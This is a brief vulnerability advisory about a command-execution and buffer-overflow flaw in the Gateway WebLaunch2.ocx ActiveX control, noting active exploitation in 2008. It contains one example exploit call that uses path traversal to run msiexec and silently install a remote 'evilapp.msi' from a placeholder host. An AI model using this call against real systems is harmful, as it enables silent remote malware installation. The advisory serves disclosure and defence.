|
Gateway CWebLaunchCtl ActiveX Control Command Execution and Remote Buffer Overflow Vulnerability
The following example call to the vulnerable method demonstrates executing a local script: obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i http://www.example.com/evilapp.msi /quiet"); UPDATE (March 26, 2008): The Symantec DeepSight Team has discovered that the issue affecting 'WebLaunch2.ocx' is being actively exploited in the wild. A proof of concept for executing local scripts and an exploit for the buffer-overflow issue are available: |
|
|
Privacy Statement |
